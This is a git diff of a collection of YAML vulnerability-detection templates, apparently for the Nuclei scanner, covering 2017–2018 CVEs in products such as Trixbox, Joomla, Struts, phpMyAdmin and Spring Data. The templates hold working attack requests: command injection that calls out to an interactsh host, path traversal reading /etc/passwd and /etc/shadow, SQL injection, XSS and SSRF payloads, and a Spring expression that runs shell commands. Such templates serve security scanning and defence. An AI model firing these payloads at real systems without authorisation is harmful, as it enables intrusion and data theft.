https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-14135 + cwe-id: CWE-78 + metadata: + shodan-query: title:"Dreambox WebControl" + tags: cve,cve2017,dreambox,rce,oast + +requests: + - raw: + - | + GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "/bin/sh" + - "/usr/script" + condition: and + + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/poc/cve/cve-2017-14537.yaml b/poc/cve/cve-2017-14537.yaml index 59784daa6f..66f9cfe5ba 100644 --- a/poc/cve/cve-2017-14537.yaml +++ b/poc/cve/cve-2017-14537.yaml @@ -1,49 +1,51 @@ id: CVE-2017-14537 info: - name: trixbox 2.8.0 - directory-traversal + name: Trixbox 2.8.0 - Path Traversal author: pikpikcu severity: medium - -# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537 -# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ -# Product vendor:-https://sourceforge.net/projects/asteriskathome/ + description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. + reference: + - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 + - https://sourceforge.net/projects/asteriskathome/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2017-14537 + cwe-id: CWE-22 + tags: cve,cve2017,trixbox,lfi requests: - raw: - | POST /maint/index.php?packages HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/maint/index.php?packages - Content-Length: 160 Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: keep-alive xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages - | GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: {{Hostname}}/maint/index.php?packages Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: keep-alive - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body + +# Enhanced by mp on 2022/04/26 diff --git a/poc/cve/cve-2017-17059.yaml b/poc/cve/cve-2017-17059.yaml index 5fcc0923df..fe491e117d 100644 --- a/poc/cve/cve-2017-17059.yaml +++ b/poc/cve/cve-2017-17059.yaml @@ -8,12 +8,13 @@ info: reference: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 - tags: cve,cve2017,wordpress,xss,wp-plugin + - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin requests: - method: POST diff --git a/poc/cve/cve-2017-18024.yaml b/poc/cve/cve-2017-18024.yaml index 2978f46ded..f10df9314d 100644 --- a/poc/cve/cve-2017-18024.yaml +++ b/poc/cve/cve-2017-18024.yaml @@ -4,17 +4,17 @@ info: name: AvantFAX 3.3.3 XSS author: pikpikcu severity: medium + description: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. reference: - https://hackerone.com/reports/963798 - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2017-18024 - description: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. - tags: cve,cve2017,xss,avantfax classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-18024 cwe-id: CWE-79 + tags: cve,cve2017,xss,avantfax requests: - raw: diff --git a/poc/cve/cve-2017-18598.yaml b/poc/cve/cve-2017-18598.yaml index 8ead934948..3b783df22d 100644 --- a/poc/cve/cve-2017-18598.yaml +++ b/poc/cve/cve-2017-18598.yaml @@ -1,15 +1,15 @@ id: CVE-2017-18598 info: - name: WordPress Qards - Cross-Site Scripting + name: Qards Plugin - Stored XSS and SSRF author: pussycat0x severity: medium - description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php. + description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php reference: - https://wpscan.com/vulnerability/8934 - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 - - https://wpvulndb.com/vulnerabilities/8934 - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 + - https://wpvulndb.com/vulnerabilities/8934 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -32,6 +32,4 @@ requests: - type: word part: body words: - - "console.log" - -# Enhanced by mp on 2022/08/12 + - "console.log" \ No newline at end of file diff --git a/poc/cve/cve-2017-18638.yaml b/poc/cve/cve-2017-18638.yaml new file mode 100644 index 0000000000..4cf8aec3d8 --- /dev/null +++ b/poc/cve/cve-2017-18638.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-18638 + +info: + name: Graphite 'graphite.composer.views.send_email' SSRF + author: huowuzhao + severity: high + description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + reference: + - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html + - https://github.com/graphite-project/graphite-web/issues/2008 + - https://github.com/advisories/GHSA-vfj6-275q-4pvm + - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-18638 + cwe-id: CWE-918 + tags: cve,cve2017,graphite,ssrf,oast + +requests: + - method: GET + path: + - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/poc/cve/cve-2017-5982.yaml b/poc/cve/cve-2017-5982.yaml index 1f114f79b3..fe0f9bdd7f 100644 --- a/poc/cve/cve-2017-5982.yaml +++ b/poc/cve/cve-2017-5982.yaml @@ -1,4 +1,5 @@ id: CVE-2017-5982 + info: name: Kodi 17.1 Local File Inclusion author: 0x_Akoko @@ -7,6 +8,8 @@ info: reference: - https://cxsecurity.com/issue/WLB-2017020164 - https://www.cvedetails.com/cve/CVE-2017-5982 + - https://www.exploit-db.com/exploits/41312/ + - http://seclists.org/fulldisclosure/2017/Feb/27 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/poc/cve/cve-2017-7529.yaml b/poc/cve/cve-2017-7529.yaml new file mode 100644 index 0000000000..b05d81075d --- /dev/null +++ b/poc/cve/cve-2017-7529.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-7529 +info: + author: "Harsh Bothra" + name: "Nginx Remote Integer Overflow" + severity: medium + +# This template supports the detection part only. +# Do not test any website without permission +# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Range: bytes=-17208,-9223372036854758792 + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 206 + - type: word + words: + - Content-Range + part: all \ No newline at end of file diff --git a/poc/cve/cve-2017-8917.yaml b/poc/cve/cve-2017-8917.yaml index 6569d699db..bbbf1e7547 100644 --- a/poc/cve/cve-2017-8917.yaml +++ b/poc/cve/cve-2017-8917.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.cvedetails.com/cve/CVE-2017-8917/ - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - - http://web.archive.org/web/20210421142819/https://www.securityfocus.com/bid/98515 - - http://web.archive.org/web/20211207050608/https://securitytracker.com/id/1038522 + - http://www.securityfocus.com/bid/98515 + - http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -18,18 +18,15 @@ info: cwe-id: CWE-89 tags: cve,cve2017,joomla,sqli -variables: - num: "999999999" - requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)" + - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" matchers: - type: word part: body words: - - '{{md5({{num}})}}' + - "cf79ae6addba60ad018347359bd144d2" # Enhanced by mp on 2022/05/11 diff --git a/poc/cve/cve-2017-9140.yaml b/poc/cve/cve-2017-9140.yaml index 6fd9b5c7e9..df598c2967 100644 --- a/poc/cve/cve-2017-9140.yaml +++ b/poc/cve/cve-2017-9140.yaml @@ -4,17 +4,19 @@ info: name: Reflected XSS - Telerik Reporting Module author: dhiyaneshDk severity: medium - tags: cve,cve2017,xss,telerik description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. - remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later. reference: - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module - https://nvd.nist.gov/vuln/detail/CVE-2017-9140 + - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module + - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406) + remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-9140 cwe-id: CWE-79 + tags: cve,cve2017,xss,telerik requests: - method: GET diff --git a/poc/cve/cve-2017-9288.yaml b/poc/cve/cve-2017-9288.yaml index 843b3c84d2..bc6706fc06 100644 --- a/poc/cve/cve-2017-9288.yaml +++ b/poc/cve/cve-2017-9288.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 - tags: cve,cve2017,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + - https://github.com/MindscapeHQ/raygun4wordpress/pull/17 + - https://github.com/MindscapeHQ/raygun4wordpress/issues/16 + - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-9288 cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2017-9506.yaml b/poc/cve/cve-2017-9506.yaml index 9106898094..393153702a 100644 --- a/poc/cve/cve-2017-9506.yaml +++ b/poc/cve/cve-2017-9506.yaml @@ -2,16 +2,29 @@ id: CVE-2017-9506 info: name: Jira IconURIServlet SSRF - author: pd-team - severity: high + author: pdteam + severity: medium description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). + reference: + - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html + - https://ecosystem.atlassian.net/browse/OAUTH-344 + - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-9506 + cwe-id: CWE-918 + tags: cve,cve2017,atlassian,jira,ssrf,oast requests: - - method: GET - path: - - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json" + - raw: + - | + GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + matchers: - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "ipinfo.io/missingauth" - part: body + - "http" diff --git a/poc/cve/cve-2017-9805.yaml b/poc/cve/cve-2017-9805.yaml index c62b854a41..fafd5baa0e 100644 --- a/poc/cve/cve-2017-9805.yaml +++ b/poc/cve/cve-2017-9805.yaml @@ -5,34 +5,24 @@ info: author: pikpikcu severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. - remediation: | - Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 - - http://www.securitytracker.com/id/1039263 - - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 - epss-score: 0.97545 - epss-percentile: 0.99994 - cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: apache - product: struts - tags: cve,cve2017,apache,rce,struts,kev + tags: cve,cve2017,apache,rce,struts -http: +requests: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" - + headers: + Content-Type: application/xml body: | @@ -92,11 +82,9 @@ http: - headers: - Content-Type: application/xml - matchers-condition: and matchers: + - type: word words: - "Debugging information" @@ -107,4 +95,4 @@ http: status: - 500 -# digest: 4b0a00483046022100fffb5572ea6a3a9e66caeba001ac48de1a809db496abc1d5367643a27b64e550022100e7862b50988b1084007910376221f62bcb95de32c3bd50681d323f776c17ecd5:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/04/20 diff --git a/poc/cve/cve-2018-0127.yaml b/poc/cve/cve-2018-0127.yaml new file mode 100644 index 0000000000..3ad69c3b88 --- /dev/null +++ b/poc/cve/cve-2018-0127.yaml @@ -0,0 +1,40 @@ +id: CVE-2018-0127 + +info: + name: Cisco RV132W/RV134W Router - Information Disclosure + author: jrolf + severity: critical + description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information. + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2 + - http://www.securitytracker.com/id/1040345 + - http://www.securityfocus.com/bid/102969 + - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-0127 + cwe-id: CWE-306 + tags: cve,cve2018,cisco,router + +requests: + - method: GET + path: + - "{{BaseURL}}/dumpmdm.cmd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + condition: and + words: + - "Dump" + - "MDM" + - "cisco" + - "admin" + +# Enhanced by mp on 2022/05/12 diff --git a/poc/cve/cve-2018-1000130.yaml b/poc/cve/cve-2018-1000130.yaml index 9b56c41fde..8fe310b37c 100644 --- a/poc/cve/cve-2018-1000130.yaml +++ b/poc/cve/cve-2018-1000130.yaml @@ -5,15 +5,15 @@ info: author: milo2012 severity: high description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server. - tags: cve,cve2018,jolokia,rce,jndi,proxy + reference: + - https://jolokia.org/#Security_fixes_with_1.5.0 + - https://access.redhat.com/errata/RHSA-2018:2669 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2018-1000130 cwe-id: CWE-74 - reference: - - https://jolokia.org/#Security_fixes_with_1.5.0 - - https://access.redhat.com/errata/RHSA-2018:2669 + tags: cve,cve2018,jolokia,rce,jndi,proxy requests: - raw: diff --git a/poc/cve/cve-2018-10956.yaml b/poc/cve/cve-2018-10956.yaml index 89b1bbae56..dd4b86b2af 100644 --- a/poc/cve/cve-2018-10956.yaml +++ b/poc/cve/cve-2018-10956.yaml @@ -1,5 +1,5 @@ - id: CVE-2018-10956 + info: name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. author: 0x_Akoko @@ -7,26 +7,29 @@ info: description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. reference: - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ + - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb - https://www.cvedetails.com/cve/CVE-2018-10956 + - https://www.exploit-db.com/exploits/44916/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 - tags: cve,cve2018,Orchid,vms,lfi - + metadata: + shodan-query: http.title:"Orchid Core VMS" + tags: cve,cve2018,orchid,vms,lfi + requests: - method: GET path: - - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/shadow" + - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd" + matchers-condition: and matchers: - - type: word - words: - - "root:*:" - - "bin:*:" - condition: and - part: body + - type: regex + regex: + - "root:.*:0:0:" + - type: status status: - 200 diff --git a/poc/cve/cve-2018-11231.yaml b/poc/cve/cve-2018-11231.yaml index 9412a5f837..0245c2a8a3 100644 --- a/poc/cve/cve-2018-11231.yaml +++ b/poc/cve/cve-2018-11231.yaml @@ -1,38 +1,56 @@ id: CVE-2018-11231 + info: name: Opencart Divido - Sql Injection author: ritikchaddha severity: high description: | OpenCart Divido plugin is susceptible to SQL injection + impact: | + This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system. + remediation: | + Apply the official patch or upgrade to a version that includes the fix. reference: - - http://foreversong.cn/archives/1183 + - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183 - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 + - http://foreversong.cn/archives/1183 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2018-11231 cwe-id: CWE-89 - tags: cve,cve2018,opencart,sqli + epss-score: 0.00903 + epss-percentile: 0.82368 + cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* + metadata: + max-request: 1 + vendor: divido + product: divido + framework: opencart + tags: cve,cve2018,opencart,sqli,intrusive,divido variables: num: "999999999" -requests: + +http: - raw: - | POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 Host: {{Hostname}} {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2} - redirects: true + + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - - '{{md5({{num}})}}' + - "{{md5({{num}})}}" + - type: status status: - 200 - -# Enhanced by mp on 2022/06/19 +# digest: 4b0a0048304602210094fdc034027036f675331a436c8d9717e75ce79fc7a19d05b65af74381436044022100f81d99821fdfe5caea01c0c541569fd07dd78ac1522bbf7146f0a3b802ac09e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-12054.yaml b/poc/cve/cve-2018-12054.yaml index 7c0f78a175..99e0202257 100644 --- a/poc/cve/cve-2018-12054.yaml +++ b/poc/cve/cve-2018-12054.yaml @@ -4,16 +4,18 @@ info: name: Schools Alert Management Script - Arbitrary File Read author: wisnupramoedya severity: high - description: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal. + description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal. reference: - https://www.exploit-db.com/exploits/44874 - - https://www.cvedetails.com/cve/CVE-2018-12054 - tags: cve,cve2018,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2018-12054 + - https://github.com/unh3x/just4cve/issues/4 + - https://www.exploit-db.com/exploits/44874/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 + tags: cve,cve2018,lfi requests: - method: GET @@ -30,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/poc/cve/cve-2018-12095.yaml b/poc/cve/cve-2018-12095.yaml new file mode 100644 index 0000000000..cd09108f78 --- /dev/null +++ b/poc/cve/cve-2018-12095.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-12095 + +info: + name: OEcms 3.1 - Cross-Site Scripting + author: LogicalHunter + severity: medium + description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php. + reference: + - https://www.exploit-db.com/exploits/44895 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 + - https://cxsecurity.com/issue/WLB-2018060092 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2018-12095 + cwe-id: CWE-79 + tags: cve,cve2018,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2018-12613.yaml b/poc/cve/cve-2018-12613.yaml new file mode 100644 index 0000000000..9b58a055d2 --- /dev/null +++ b/poc/cve/cve-2018-12613.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-12613 + +info: + name: PhpMyAdmin 4.8.1 Remote File Inclusion + author: pikpikcu + severity: high + description: An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). + reference: + - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 + - https://www.phpmyadmin.net/security/PMASA-2018-4/ + - https://www.exploit-db.com/exploits/44928/ + - http://www.securityfocus.com/bid/104532 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2018-12613 + cwe-id: CWE-287 + tags: cve,cve2018,phpmyadmin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2018-1273.yaml b/poc/cve/cve-2018-1273.yaml index 21e4b73c22..50db2cdc93 100644 --- a/poc/cve/cve-2018-1273.yaml +++ b/poc/cve/cve-2018-1273.yaml @@ -1,7 +1,7 @@ id: CVE-2018-1273 info: - name: Spring Data Commons Unauthenticated RCE + name: Spring Data Commons - Remote Code Execution author: dwisiswant0 severity: critical description: | @@ -10,25 +10,39 @@ info: caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources - or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack. + or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-1273 + - https://pivotal.io/security/cve-2018-1273 + - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-1273 + cwe-id: CWE-20 + tags: cve,cve2018,vmware,rce,spring requests: - - payloads: - command: - - "cat /etc/passwd" - - "type C:\\/Windows\\/win.ini" - raw: + - raw: - | POST /account HTTP/1.1 Host: {{Hostname}} Connection: close Content-Type: application/x-www-form-urlencoded - name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei + name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]=nuclei + + payloads: + command: + - "cat /etc/passwd" + - "type C:\\/Windows\\/win.ini" + matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body + +# Enhanced by mp on 2022/05/12 diff --git a/poc/cve/cve-2018-13380.yaml b/poc/cve/cve-2018-13380.yaml index 36d649a0b8..be4ef26f42 100644 --- a/poc/cve/cve-2018-13380.yaml +++ b/poc/cve/cve-2018-13380.yaml @@ -5,6 +5,8 @@ info: author: shelld3v,AaronChen0 severity: medium description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Fortinet to fix this vulnerability. reference: @@ -12,13 +14,14 @@ info: - https://fortiguard.com/advisory/FG-IR-18-383 - https://fortiguard.com/advisory/FG-IR-20-230 - https://nvd.nist.gov/vuln/detail/CVE-2018-13380 + - https://github.com/merlinepedra25/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46323 + epss-percentile: 0.46406 cpe: 